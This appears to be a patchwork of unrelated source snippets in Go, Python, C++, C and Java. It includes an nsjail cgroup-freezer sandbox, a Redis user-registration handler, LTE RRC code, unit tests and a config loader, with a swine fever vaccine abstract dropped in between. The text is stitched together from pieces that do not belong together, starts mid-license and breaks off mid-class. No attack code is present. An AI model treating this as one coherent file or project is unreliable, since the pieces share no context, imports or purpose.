distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package interactive
import (
"os/exec"
"testing"
"github.com/davecgh/go-spew/spew"
)
var (
    mySpew        *spew.ConfigState // dumper used to print a failing exec.Cmd
    arbitraryArgs []string          // canonical argv fixture shared by the tests
)

func init() {
    mySpew = spew.NewDefaultConfig()
    // Dumping an exec.Cmd must not invoke methods on it.
    mySpew.DisableMethods = true
    arbitraryArgs = []string{"docker", "run", "something"}
}
func argsValidator(t *testing.T, args []string) func(c *exec.Cmd) error {
return func(c *exec.Cmd) error {
for i, arg := range arbitraryArgs {
if c.Args[i] != arg {
t.Errorf("c.Args[%d] not correct", i)
}
}
t.Log("Validated c.Args")
if t.Failed() {
mySpew.Sdump(*c)
}
return nil
}
}
// TestNewCommand checks that NewCommand preserves the full argv it is given.
func TestNewCommand(t *testing.T) {
    cmd := NewCommand(arbitraryArgs...)
    cmd.run = argsValidator(t, arbitraryArgs)
    cmd.Run()
}

// TestAddArgs checks that AddArgs appends to the argv of an existing command.
func TestAddArgs(t *testing.T) {
    cmd := NewCommand(arbitraryArgs[0])
    cmd.AddArgs(arbitraryArgs[1:]...)
    cmd.run = argsValidator(t, arbitraryArgs)
    cmd.Run()
}

// TestCommandStringer only exercises the String method (output is logged).
func TestCommandStringer(t *testing.T) {
    t.Log(NewCommand("true"))
}
|
async def register_users(user: User):
    """Persist a new user record, index it by district and start verification.

    Stores the user JSON under their e-mail, queues a verification mail with
    a freshly generated code, and appends the e-mail to the district index
    (creating the district array on first use). Responds 201 on success.
    """
    client = get_redis_client()
    verification_code = os.urandom(3).hex()

    user.code = verification_code
    user.session_ids = []

    client.jsonset('users', Path(f'["{user.email}"]'), dict(user))
    send_verification_mail.delay(user.email, verification_code)

    district_path = Path(f'["{str(user.district)}"]')
    if client.jsontype("districts", district_path) is None:
        client.jsonset("districts", district_path, [])
    client.jsonarrappend("districts", district_path, user.email)

    return JSONResponse({"success": True}, status_code=201)
// This function is called from PRACH worker (can wait).
// Registers a new RNTI with the RRC and the lower layers; for the multicast
// RNTI it additionally sets up the MBMS bearers advertised in the MCCH.
void rrc::add_user(uint16_t rnti)
{
  pthread_mutex_lock(&user_mutex);
  if (users.count(rnti) == 0) {
    // operator[] default-constructs the user entry on first access.
    users[rnti].parent = this;
    users[rnti].rnti = rnti;
    rlc->add_user(rnti);
    pdcp->add_user(rnti);
    rrc_log->info("Added new user rnti=0x%x\n", rnti);
  } else {
    rrc_log->error("Adding user rnti=0x%x (already exists)\n", rnti);
  }

  if (rnti == SRSLTE_MRNTI) {
    // Downlink-only data PDCP configuration for the multicast bearers.
    srslte::srslte_pdcp_config_t cfg;
    cfg.is_control = false;
    cfg.is_data = true;
    cfg.direction = SECURITY_DIRECTION_DOWNLINK;
    uint32_t teid_in = 1;
    // One MRB per session announced in the first PMCH of the MCCH.
    // NOTE(review): GTP-U bearer/ids are hard-coded to 1 here -- confirm this
    // is intentional for the single-PMCH case.
    for (uint32_t i = 0; i < mcch.pmch_infolist_r9[0].mbms_sessioninfolist_r9_size; i++) {
      uint32_t lcid = mcch.pmch_infolist_r9[0].mbms_sessioninfolist_r9[i].logicalchannelid_r9;
      rlc->add_bearer_mrb(SRSLTE_MRNTI, lcid);
      pdcp->add_bearer(SRSLTE_MRNTI, lcid, cfg);
      gtpu->add_bearer(SRSLTE_MRNTI, lcid, 1, 1, &teid_in);
    }
  }
  pthread_mutex_unlock(&user_mutex);
}
// Invoke fulfils the Batcher interface. It reads from the expect connection
// until the regexp b.Re matches the accumulated buffer, the context is
// cancelled, or the read deadline (timeout) expires.
func (b *BRecv) Invoke(ctx context.Context, exp *Expect, timeout time.Duration, batchIdx int) error {
    // Reset the deadline on exit so later batchers start with a clean conn.
    defer exp.Conn.SetReadDeadline(time.Time{})
    exp.Conn.SetReadDeadline(time.Now().Add(timeout))
    var offs []int
    for {
        // Bail out promptly if the caller cancelled.
        select {
        case <-ctx.Done():
            return ctx.Err()
        default:
        }
        offs = b.Re.FindSubmatchIndex(exp.buf)
        if offs != nil {
            break
        }
        // No match yet: pull more bytes (bounded by the read deadline).
        var buf [512]byte
        sz, err := exp.Conn.Read(buf[:])
        if err != nil {
            return err
        }
        if exp.Logger != nil {
            exp.Logger(Log{Type: MsgRecv, Data: string(buf[:sz])})
        }
        exp.buf = append(exp.buf, buf[:sz]...)
    }
    // Give the success callback first say; otherwise drop the matched prefix.
    if cbExisted, err := b.onSuccess(exp, offs); cbExisted {
        return err
    }
    exp.buf = exp.buf[offs[1]:]
    return nil
}
Classical swine fever virus replicon particles lacking the Erns gene: a potential marker vaccine for intradermal application.
Classical swine fever virus replicon particles (CSF-VRP) deficient for E(rns) were evaluated as a non-transmissible marker vaccine. A cDNA clone of CSFV strain Alfort/187 was used to obtain a replication-competent mutant genome (replicon) lacking the sequence encoding the 227 amino acids of the glycoprotein E(rns) (A187delE(rns)). For packaging of A187delE(rns) into virus particles, porcine kidney cell lines constitutively expressing E(rns) of CSFV were established. The rescued VRP were infectious in cell culture but did not yield infectious progeny virus. Single intradermal vaccination of two pigs with 10(7) TCID(50) of VRP A187delE(rns) elicited neutralizing antibodies, anti-E2 antibodies, and cellular immune responses determined by an increase of IFN-gamma producing cells. No anti-E(rns) antibodies were detected in the vaccinees confirming that this vaccine represents a negative marker vaccine allowing differentiation between infected and vaccinated animals. The two pigs were protected against lethal challenge with the highly virulent CSFV strain Eystrup. In contrast, oral immunization resulted in only partial protection, and neither CSFV-specific antibodies nor stimulated T-cells were found before challenge. These data represent a good basis for more extended vaccination/challenge trials including larger numbers of animals as well as more thorough analysis of virus shedding using sentinel animals to monitor horizontal spread of the challenge virus. |
package meet_eat.data.entity;
import meet_eat.data.entity.user.User;
import meet_eat.data.factory.TokenFactory;
import meet_eat.data.factory.UserFactory;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotEquals;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertNull;
/**
 * Unit tests covering {@link Token} construction, null handling and
 * equality/hash-code behaviour.
 */
public class TokenCommonTest {

    @Test
    public void testConstructorWithUserAndValue() {
        // Test data
        UserFactory userFactory = new UserFactory();
        User user = userFactory.getValidObject();
        String value = "ThisIsAValue";
        // Execution
        Token token = new Token(user, value);
        // Assertions
        assertNotNull(token);
    }

    @Test
    public void testConstructor() {
        // Execution: the factory produces a fully populated, valid token.
        Token token = new TokenFactory().getValidObject();
        // Assertion
        assertNotNull(token);
    }

    @Test
    public void testConstructorNullIdentifier() {
        // A null identifier is allowed and must be preserved as null.
        // Test data
        UserFactory userFactory = new UserFactory();
        User user = userFactory.getValidObject();
        String value = "ACrazyValue";
        // Execution
        Token token = new Token(null, user, value);
        // Assertion
        assertNotNull(token);
        assertNull(token.getIdentifier());
    }

    @Test(expected = NullPointerException.class)
    public void testConstructorNullUser() {
        // A null user must be rejected.
        // Test data
        String identifier = "AnIdentifier";
        String value = "ValueIsNotNull";
        // Execution
        new Token(identifier, null, value);
    }

    @Test(expected = NullPointerException.class)
    public void testConstructorNullValue() {
        // A null token value must be rejected.
        // Test data
        String identifier = "AnotherIdentifier";
        UserFactory userFactory = new UserFactory();
        User user = userFactory.getValidObject();
        // Execution
        new Token(identifier, user, null);
    }

    @Test
    public void testTokenNotEqual() {
        // Two independently created tokens must not compare equal.
        // Execution
        TokenFactory tokenFactory = new TokenFactory();
        Token token1 = tokenFactory.getValidObject();
        Token token2 = tokenFactory.getValidObject();
        // Assertion
        assertNotEquals(token1, token2);
    }

    @Test
    public void testEquals() {
        // equals/hashCode contract: reflexive, null-safe, type-safe, and a
        // field-for-field copy is equal with a matching hash code.
        // Execution
        Token token = new TokenFactory().getValidObject();
        Token tokenCopy = new Token(token.getIdentifier(), token.getUser(), token.getValue());
        // Assertions
        assertEquals(token, token);
        assertNotEquals(null, token);
        assertNotEquals(token, new Object());
        assertEquals(token, tokenCopy);
        assertEquals(token.hashCode(), tokenCopy.hashCode());
    }
}
|
package techreborn.blockentity.machine.tier0.block.blockplacer;
import net.minecraft.nbt.NbtCompound;
import reborncore.client.screen.builder.BlockEntityScreenHandlerBuilder;
import techreborn.blockentity.machine.tier0.block.ProcessingStatus;
/**
* <b>Class handling Nbt values of the Block Placer</b>
* <br>
* Inherited by the {@link BlockPlacerProcessor} for keeping its values in sync when saving/loading a map
*
* @author SimonFlapse
* @see BlockPlacerProcessor
*/
class BlockPlacerNbt {
    // Ticks required to place one block.
    protected int placeTime;
    // Ticks elapsed towards the current placement.
    protected int currentPlaceTime;
    // Current machine status; persisted and synced via its numeric code.
    protected ProcessingStatus status = BlockPlacerStatus.IDLE;

    /** Serializes the placer state into the given NBT tag. */
    public void writeNbt(NbtCompound tag) {
        tag.putInt("placeTime", this.placeTime);
        tag.putInt("currentPlaceTime", this.currentPlaceTime);
        tag.putInt("blockPlacerStatus", getStatus());
    }

    /** Restores the placer state from the given NBT tag. */
    public void readNbt(NbtCompound tag) {
        this.placeTime = tag.getInt("placeTime");
        this.currentPlaceTime = tag.getInt("currentPlaceTime");
        setStatus(tag.getInt("blockPlacerStatus"));
    }

    /** Registers the fields above for client/server screen syncing. */
    public BlockEntityScreenHandlerBuilder syncNbt(BlockEntityScreenHandlerBuilder builder) {
        return builder.sync(this::getPlaceTime, this::setPlaceTime)
                .sync(this::getCurrentPlaceTime, this::setCurrentPlaceTime)
                .sync(this::getStatus, this::setStatus);
    }

    protected int getPlaceTime() {
        return placeTime;
    }

    protected void setPlaceTime(int placeTime) {
        this.placeTime = placeTime;
    }

    protected int getCurrentPlaceTime() {
        return currentPlaceTime;
    }

    protected void setCurrentPlaceTime(int currentPlaceTime) {
        this.currentPlaceTime = currentPlaceTime;
    }

    protected int getStatus() {
        return status.getStatusCode();
    }

    // NOTE(review): getStatus writes status.getStatusCode() but setStatus
    // indexes BlockPlacerStatus.values() with that code; the round trip is
    // only correct if every status code equals its enum ordinal -- confirm.
    protected void setStatus(int status) {
        this.status = BlockPlacerStatus.values()[status];
    }
}
|
/*
 * NXFindBestFatArch() is passed a cputype and cpusubtype and a set of
 * fat_arch structs and selects the best one that matches (if any) and returns
 * a pointer to that fat_arch struct (or NULL). The fat_arch structs must be
 * in the host byte order and correct such that the fat_archs really points to
 * enough memory for nfat_arch structs. It is possible that this routine could
 * fail if new cputypes or cpusubtypes are added and an old version of this
 * routine is used. But if there is an exact match between the cputype and
 * cpusubtype and one of the fat_arch structs this routine will always succeed.
 */
struct fat_arch *
NXFindBestFatArch(
cpu_type_t cputype,
cpu_subtype_t cpusubtype,
struct fat_arch *fat_archs,
uint32_t nfat_archs)
{
    int32_t best;

    /* The worker returns the index of the best slice, or -1 for no match. */
    best = internal_NXFindBestFatArch(cputype, cpusubtype, fat_archs, NULL,
                                      nfat_archs);
    return best == -1 ? NULL : fat_archs + best;
}
<gh_stars>1-10
package freezer
import (
"context"
"errors"
"fmt"
"io"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"time"
nsjailpb "github.com/dzeromsk/subslicer/freezer/pb"
"github.com/golang/protobuf/proto"
"github.com/justincormack/go-memfd"
)
var (
    // cgroup v1 mount points used to control the jailed process tree.
    FreezerDir = "/sys/fs/cgroup/freezer"
    MemoryDir  = "/sys/fs/cgroup/memory"
)

// Freezer runs a command inside an nsjail sandbox whose process tree can be
// suspended and resumed through a dedicated cgroup v1 freezer directory.
type Freezer struct {
    *exec.Cmd

    Name   string // program to execute inside the jail
    Chroot string // jail root directory; "/" when left empty
    // Configure builds the nsjail configuration for this freezer; callers
    // may replace it to customise the sandbox.
    Configure func(*Freezer) *nsjailpb.NsJailConfig

    nsjail     *memfd.Memfd // nsjail binary held in an anonymous memfd
    wrapper    *memfd.Memfd // shell wrapper that joins the cgroup, then execs nsjail
    config     *memfd.Memfd // serialized nsjail config
    state      *os.File     // handle to freezer.state for FROZEN/THAWED writes
    freezerDir string       // per-instance cgroup directory under FreezerDir
}
// NewFreezer builds a Freezer for the given program and arguments using a
// background context.
func NewFreezer(name string, arg ...string) (*Freezer, error) {
    return NewSandboxContext(context.Background(), name, arg...)
}

// NewSandboxContext builds a Freezer bound to ctx. It creates a fresh cgroup
// freezer directory plus in-memory files (memfds) for the nsjail binary, the
// wrapper script, and the not-yet-written nsjail config.
//
// NOTE(review): on the error paths below, resources created earlier (the
// cgroup directory, f.state, f.config, f.nsjail) are not released; only a
// successful constructor hands cleanup over to Close. Confirm whether
// leaking on failure is acceptable here.
func NewSandboxContext(ctx context.Context, name string, arg ...string) (f *Freezer, err error) {
    if ctx == nil {
        return nil, errors.New("nil context")
    }
    // if filepath.Base(name) == name {
    // 	if _, err := exec.LookPath(name); err != nil {
    // 		return nil, err
    // 	}
    // }
    // ctx is hidden in Cmd struct; the argv[0] placeholder is rewritten in
    // Start.
    f = &Freezer{
        Cmd: exec.CommandContext(ctx, "/dev/null", arg...),
    }
    f.Name = name
    // Per-instance cgroup directory; the wrapper script writes its PID into
    // its "tasks" file so the whole jailed tree lands in this cgroup.
    f.freezerDir, err = ioutil.TempDir(FreezerDir, "gofreezer")
    if err != nil {
        return nil, err
    }
    tasks := filepath.Join(f.freezerDir, "tasks")
    state := filepath.Join(f.freezerDir, "freezer.state")
    f.state, err = os.OpenFile(state, os.O_WRONLY, 0666)
    if err != nil {
        return nil, err
    }
    f.config, err = memfd.CreateNameFlags("freezer:config", memfd.Cloexec)
    if err != nil {
        return nil, err
    }
    f.nsjail, err = createNsjail()
    if err != nil {
        return nil, err
    }
    f.wrapper, err = createWrapper(tasks, procPath(f.nsjail.File))
    if err != nil {
        return nil, err
    }
    f.Configure = configure
    // runtime.SetFinalizer(f, (*Freezer).Close)
    return f, nil
}
// Close releases everything the constructor allocated: it thaws the cgroup,
// closes the memfds and the state file, and removes the per-instance freezer
// directory (retrying once after a delay, presumably because the cgroup can
// still hold exiting tasks -- confirm). The last error encountered wins.
func (f *Freezer) Close() error {
    // TODO(dzeromsk): multierr or something
    var err error
    if err2 := f.Thaw(); err2 != nil {
        err = err2
    }
    files := []io.Closer{f.config, f.wrapper, f.state, f.nsjail}
    for _, f := range files {
        if err2 := f.Close(); err2 != nil {
            err = err2
        }
    }
    if err2 := os.Remove(f.freezerDir); err2 != nil {
        // TODO(dzeromsk): proper retry + backoff, or poll
        time.Sleep(500 * time.Millisecond)
        if err3 := os.Remove(f.freezerDir); err3 != nil {
            err = err3
        } else {
            // err = err2
        }
    }
    // runtime.SetFinalizer(f, nil)
    return err
}
// Run starts the jailed command and waits for it to complete, mirroring
// (*exec.Cmd).Run.
func (f *Freezer) Run() error {
    if err := f.Start(); err != nil {
        return err
    }
    return f.Wait()
}

// Start launches the command inside nsjail via the cgroup wrapper script.
// It serializes the config produced by f.Configure, then rewrites the
// command line so the wrapper execs nsjail, which in turn runs f.Name.
func (f *Freezer) Start() error {
    if f.Process != nil {
        return errors.New("freezer: already started")
    }
    // serialize nsjail config to file
    if err := proto.MarshalText(f.config, f.Configure(f)); err != nil {
        return err
    }
    // run command in nsjail
    f.Args = append([]string{
        "nsjail", "--quiet", "--config", procPath(f.config.File), "--", f.Name,
    }, f.Args[1:]...)
    // we call nsjail via wrapper with cgroup freezer
    f.Path = procPath(f.wrapper.File)
    f.Dir = ""
    f.Env = nil
    return f.Cmd.Start()
}

// Freeze suspends every task in this freezer's cgroup.
func (f *Freezer) Freeze() error {
    _, err := f.state.WriteString("FROZEN")
    return err
}

// Thaw resumes the tasks previously suspended by Freeze.
func (f *Freezer) Thaw() error {
    _, err := f.state.WriteString("THAWED")
    return err
}
// configure is the default Configure implementation. It bind-mounts the
// chroot read-only as /, maps root inside the jail to nobody/nogroup
// outside, and forwards the wrapped Cmd's environment and extra file
// descriptors into the jail.
func configure(f *Freezer) *nsjailpb.NsJailConfig {
    if f.Chroot == "" {
        f.Chroot = "/"
    }
    if f.Dir == "" {
        f.Dir = "/"
    }
    // Collect fds of ExtraFiles to pass through. Note the loop variable
    // deliberately shadows the outer f (*Freezer) with an *os.File.
    var passFd []int32
    for _, f := range f.ExtraFiles {
        passFd = append(passFd, int32(f.Fd()))
    }
    config := &nsjailpb.NsJailConfig{
        Mount: []*nsjailpb.MountPt{
            {
                Src:    proto.String(f.Chroot),
                Dst:    proto.String("/"),
                IsBind: proto.Bool(true),
                Rw:     proto.Bool(false),
                IsDir:  proto.Bool(true),
            },
            {
                Src:    proto.String("/dev/urandom"),
                Dst:    proto.String("/dev/urandom"),
                IsBind: proto.Bool(true),
            },
        },
        Uidmap: []*nsjailpb.IdMap{{
            InsideId:  proto.String("root"),
            OutsideId: proto.String("nobody"),
        }},
        Gidmap: []*nsjailpb.IdMap{{
            InsideId:  proto.String("root"),
            OutsideId: proto.String("nogroup"),
        }},
        Cwd:             proto.String(f.Dir),
        MountProc:       proto.Bool(true),
        Envar:           f.Env,
        PassFd:          passFd,
        Hostname:        proto.String("freezer"),
        LogLevel:        nsjailpb.LogLevel_WARNING.Enum(),
        RlimitAsType:    nsjailpb.RLimit_INF.Enum(),
        RlimitFsizeType: nsjailpb.RLimit_INF.Enum(),
        CloneNewnet:     proto.Bool(false),
    }
    return config
}
// procPath returns a /proc/<pid>/fd/<fd> path through which the given
// (possibly anonymous memfd) file can be re-opened or executed.
func procPath(f *os.File) string {
    return fmt.Sprintf("/proc/%d/fd/%d", os.Getpid(), f.Fd())
}

// wrapperTemp is the shell wrapper: it writes its own PID into the freezer
// cgroup's tasks file (first %s) and then execs the nsjail binary (second
// %s), so the whole jailed tree ends up inside the cgroup.
const wrapperTemp = `#!/bin/bash
set -e
echo $$ > %s
exec -c -a nsjail %s "$@"
`

// createWrapper renders wrapperTemp into an anonymous memfd and returns it.
func createWrapper(tasks, nsjail string) (*memfd.Memfd, error) {
    f, err := memfd.CreateNameFlags("freezer:wrapper", memfd.Cloexec)
    if err != nil {
        return nil, err
    }
    _, err = f.WriteString(fmt.Sprintf(wrapperTemp, tasks, nsjail))
    if err != nil {
        return nil, err
    }
    return f, nil
}

// createNsjail copies the embedded nsjail binary (provided by the generated
// Asset function) into an anonymous memfd so it can be executed without
// touching disk.
func createNsjail() (*memfd.Memfd, error) {
    f, err := memfd.CreateNameFlags("freezer:nsjail", memfd.Cloexec)
    if err != nil {
        return nil, err
    }
    data, err := Asset("nsjail")
    if err != nil {
        return nil, err
    }
    if _, err := f.Write(data); err != nil {
        return nil, err
    }
    return f, nil
}
|
/**
 * Executes the action asynchronously with a callback.
 *
 * @param looper A Looper object whose message queue will be used for the callback,
 * or null to make callbacks on the calling thread or main thread if the current thread
 * does not have a looper associated with it.
 * @param callback The action completion callback.
 */
public void run(@Nullable Looper looper, @Nullable final ActionCompletionCallback callback) {
    // Fall back to the caller's looper, then the main looper.
    if (looper == null) {
        Looper myLooper = Looper.myLooper();
        looper = myLooper != null ? myLooper : Looper.getMainLooper();
    }
    final ActionArguments arguments = createActionArguments();
    final Handler handler = new Handler(looper);
    ActionRunnable runnable = new ActionRunnable(arguments) {
        @Override
        void onFinish(@NonNull final ActionArguments arguments, @NonNull final ActionResult result) {
            if (callback == null) {
                return;
            }
            // Deliver the callback on the requested looper; invoke inline
            // when we are already running on it.
            if (handler.getLooper() == Looper.myLooper()) {
                callback.onFinish(arguments, result);
            } else {
                handler.post(new Runnable() {
                    @Override
                    public void run() {
                        callback.onFinish(arguments, result);
                    }
                });
            }
        }
    };
    // Actions that require the UI thread run on main (inline if already
    // there); everything else is handed to the executor.
    if (shouldRunOnMain(arguments)) {
        if (Looper.myLooper() == Looper.getMainLooper()) {
            runnable.run();
        } else {
            new Handler(Looper.getMainLooper()).post(runnable);
        }
    } else {
        executor.execute(runnable);
    }
}
def computeQValueFromValues(self, state, action):
    """Return the Q-value of (state, action) under the current value estimates.

    Q(s, a) = sum over s' of T(s, a, s') * (R(s, a, s') + gamma * V(s')).
    An action with no successors yields 0.
    """
    return sum(
        prob * (self.mdp.getReward(state, action, successor)
                + self.discount * self.getValue(successor))
        for successor, prob in self.mdp.getTransitionStatesAndProbs(state, action)
    )
def generate_traj(self, N, start=None, stop=None, stride=1):
    """Generate a synthetic trajectory of length ``N`` from the estimated MSM.

    A discrete state sequence is sampled from the transition matrix and then
    mapped back to stored input frames via the model's active-state indexes.

    Parameters
    ----------
    N : int
        Number of steps to generate.
    start : optional
        State to start from; behaviour when None is delegated to pyemma's
        ``generate_traj`` -- TODO confirm its default.
    stop : optional
        State at which generation may stop early, if reached.
    stride : int
        Time step between subsequent sampled states (passed as ``dt``).

    Returns
    -------
    Frame indexes corresponding to the sampled discrete states, as produced
    by ``sample_indexes_by_sequence``.
    """
    self._check_is_estimated()
    from pyemma.msm.generation import generate_traj as _generate_traj
    syntraj = _generate_traj(self.transition_matrix, N, start=start, stop=stop, dt=stride)
    from pyemma.util.discrete_trajectories import sample_indexes_by_sequence
    return sample_indexes_by_sequence(self.active_state_indexes, syntraj)
/* Should:
 * 1) Have the right player turn
 * 2) Reverse the right subBoard
 * 3) Remove the right piece
 * 4) Have the right pieces on board
 * 5) Have the right player turn
 */
@Test
public void testUndoMove() {
    // Board with 24 pieces where it is X's turn (verified below).
    final Board gameBoard = BoardFactory.createSixBySixBoard("[xo xo ox ox o xo xxo xo ox ox xo xo]");
    final Move move = MoveFactory.createMove(6, 1, true, GameValueFactory.getDraw());
    assertEquals("Player should be X", Piece.X, gameBoard.currPlayerPiece());
    assertEquals("Pieces on board should be 24", 24, gameBoard.getPiecesOnBoard());
    final Board gameBoardAfterUndoMove = gameBoard.undoMove(move);
    // Undoing the move reverses the affected sub-board, removes one piece
    // and hands the turn back to the other player.
    assertEquals("Game board should be correct", "[ xxo x ox xooo xxo xo ox ox xo xo]", gameBoardAfterUndoMove.toString());
    assertEquals("Pieces on board should now be 23", 23, gameBoardAfterUndoMove.getPiecesOnBoard());
    assertEquals("Player should be O", Piece.O, gameBoardAfterUndoMove.currPlayerPiece());
}
/* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 2 -*-
* vim: set ts=8 sts=2 et sw=2 tw=80:
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifndef builtin_JSON_h
#define builtin_JSON_h
#include "mozilla/Range.h"
#include "NamespaceImports.h"
#include "js/RootingAPI.h"
namespace js {
class StringBuffer;
extern const JSClass JSONClass;
// Controls how Stringify traverses the value graph (see below).
enum class StringifyBehavior { Normal, RestrictedSafe };

/**
 * If stringifyBehavior is StringifyBehavior::RestrictedSafe, Stringify will
 * attempt to assert the API requirements of JS::ToJSONMaybeSafely as it
 * traverses the graph, and will not try to invoke .toJSON on things as it
 * goes.
 */
extern bool Stringify(JSContext* cx, js::MutableHandleValue vp,
                      JSObject* replacer, const Value& space, StringBuffer& sb,
                      StringifyBehavior stringifyBehavior);

// Parses the given characters as JSON, applying the optional reviver to the
// result, and stores the parsed value in vp.
template <typename CharT>
extern bool ParseJSONWithReviver(JSContext* cx,
                                 const mozilla::Range<const CharT> chars,
                                 HandleValue reviver, MutableHandleValue vp);
} // namespace js
#endif /* builtin_JSON_h */
|
import os
import abc
from .dict_utils import recursive_update
class ConfigLoaderException(Exception):
    """Raised when saving fails or the loader is used incorrectly."""
    pass


class ConfigFileNotFoundException(Exception):
    """Raised when no config file exists in any of the search locations."""
    pass
class ConfigFormatter(object):
    """Encode/decode interface used by :class:`ConfigLoader`.

    NOTE(review): ``__metaclass__`` is the Python 2 way of declaring a
    metaclass; under Python 3 it is ignored, so the abstract methods are not
    enforced there -- confirm which Python versions must be supported.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def encode(self, data):
        """
        Args:
            data: any serializable python type
        Returns:
            The encoded string data
        """
        pass

    @abc.abstractmethod
    def decode(self, data):
        """
        Args:
            data (str): the raw data from the file
        Returns:
            Dict, list or any serializable python type
        """
        pass
class ConfigLoader(object):
    """Locates, loads and saves configuration files.

    Files are searched for, in order, in: the current working directory,
    the directory of ``base_path``, the user's home directory and ``/etc``.

    Args:
        formatter (ConfigFormatter): config encode/decode interface instance
        base_path (str): a custom path which may contain the config
        nested (bool): if True, load every config file found in the sources
            and merge them via ``recursive_update``
    """
    def __init__(self, formatter, base_path, nested=False):
        # Search locations, in priority order.
        self.sources = [
            os.getcwd(),
            os.path.dirname(os.path.abspath(base_path)),
            os.path.expanduser('~'),
            '/etc',
        ]
        self.__loaded_config_file = None
        self.__formatter = formatter
        self.__nested = nested

    @property
    def filename(self):
        """Path(s) of the config file(s) resolved by :meth:`load`, or None."""
        return self.__loaded_config_file

    def __search_config_files(self, filename):
        """Return (existing config paths, all candidate paths tried)."""
        filenames = []
        tries = []
        for source in self.sources:
            file_path = os.path.join(source, filename)
            tries.append(file_path)
            if os.path.exists(file_path):
                filenames.append(file_path)
        return filenames, tries

    def __load_config_files(self, filenames):
        """Decode and merge the given config files into a single dict."""
        data = dict()
        for filename in filenames:
            with open(filename) as f:
                recursive_update(data, self.__formatter.decode(f.read()))
        return data

    def load(self, filename, create=None, default_conf=None):
        """Load the config file

        Args:
            filename (str): the filename of the config, without any path
            create (str): if the config file is not found and this parameter
                is not None, a config file will be created in this directory
                with the content of default_conf
            default_conf (dict): content of the default config data; a fresh
                empty dict is used when omitted
        Returns:
            Return value of the ConfigFormatter.decode or the default_conf value
        Raises:
            ConfigFileNotFoundException: if the config file is not found
        """
        # Use a fresh dict per call; a mutable default argument would be
        # shared (and potentially mutated) across calls.
        if default_conf is None:
            default_conf = {}
        filenames, tries = self.__search_config_files(filename)
        if filenames:
            self.__loaded_config_file = filenames if self.__nested else filenames[0]
            return self.__load_config_files(filenames if self.__nested else filenames[:1])
        if create is not None:
            self.__loaded_config_file = os.path.join(create, filename)
            self.save(default_conf)
            return default_conf
        raise ConfigFileNotFoundException("Config file not found in: %s" % tries)

    def save(self, data):
        """Save the config data

        Args:
            data: any serializable config data
        Raises:
            ConfigLoaderException: if :meth:`load` has not been called yet
                (so there is no config file name), the data is not
                serializable, or the loader is nested
        """
        if self.__nested:
            raise ConfigLoaderException("Cannot save the config if the 'nested' parameter is True!")
        if self.__loaded_config_file is None:
            raise ConfigLoaderException("Load not called yet!")
        try:
            with open(self.__loaded_config_file, 'w') as f:
                f.write(self.__formatter.encode(data))
        except Exception as e:
            raise ConfigLoaderException("Config data is not serializable: %s" % e)
|
/**
*
* @author Valdiney V GOMES
*/
@Entity
@Table(indexes = {
@Index(name = "IDX_name", columnList = "name", unique = false)})
public class Job extends Tracker<Job> implements Serializable {
private Long id;
private Server server;
private String name;
private String alias;
private String description;
private String timeRestriction;
private String node;
private int retry;
private int tolerance;
private int wait;
private User approver;
private JobStatus status;
private List<JobParent> parent = new ArrayList();
private List<Subject> subject = new ArrayList();
private List<JobCheckup> checkup = new ArrayList();
private List<JobApproval> approval = new ArrayList();
private List<WorkbenchEmail> email = new ArrayList();
private List<String> shellScript = new ArrayList();
private Set<String> channel = new HashSet();
private boolean enabled = true;
private boolean notify;
private boolean rebuild;
private boolean rebuildBlocked;
private boolean anyScope;
private boolean checkupNotified;
private String cron;
private String blockingJobs;
public Job() {
}
public Job(Long id) {
this.id = id;
}
public Job(String name, Server server) {
this.name = name;
this.server = server;
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
@OneToOne(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinColumn(name = "server_id", referencedColumnName = "id")
public Server getServer() {
return server;
}
public void setServer(Server server) {
this.server = server;
}
@Size(min = 1, max = 255)
@Column(unique = true)
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getAlias() {
return alias;
}
public void setAlias(String alias) {
this.alias = alias;
}
@Transient
public String getDisplayName() {
if (alias == null || alias.isEmpty()) {
return name.replaceAll(" ", "_");
}
return alias.replaceAll(" ", "_") + "[alias]";
}
@Column(columnDefinition = "text")
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
@Transient
public String getHTMLDescription() {
Parser parser = Parser.builder().build();
Node document = parser.parse(this.getDescription());
HtmlRenderer renderer = HtmlRenderer.builder().build();
return renderer.render(document);
}
@OneToOne(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "status_id", referencedColumnName = "id")
public JobStatus getStatus() {
if (status == null) {
status = new JobStatus();
}
return status;
}
public void setStatus(JobStatus status) {
this.status = status;
}
@ManyToMany(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinTable(name = "job_subject",
joinColumns = {
@JoinColumn(name = "job_id", referencedColumnName = "id")},
inverseJoinColumns = {
@JoinColumn(name = "subject_id", referencedColumnName = "id")})
public List<Subject> getSubject() {
return subject;
}
public void setSubject(List<Subject> subject) {
this.subject = subject;
}
public void addSubject(Subject subject) {
this.subject.add(subject);
}
@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
@OrderBy(clause = "id, scope")
public List<JobParent> getParent() {
return parent;
}
public void setParent(List<JobParent> parent) {
this.parent = parent;
}
public void addParent(JobParent parent) {
this.parent.add(parent);
}
@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
public List<JobCheckup> getCheckup() {
return checkup;
}
public void setCheckup(List<JobCheckup> checkup) {
this.checkup = checkup;
}
public void addCheckup(JobCheckup checkup) {
this.checkup.add(checkup);
}
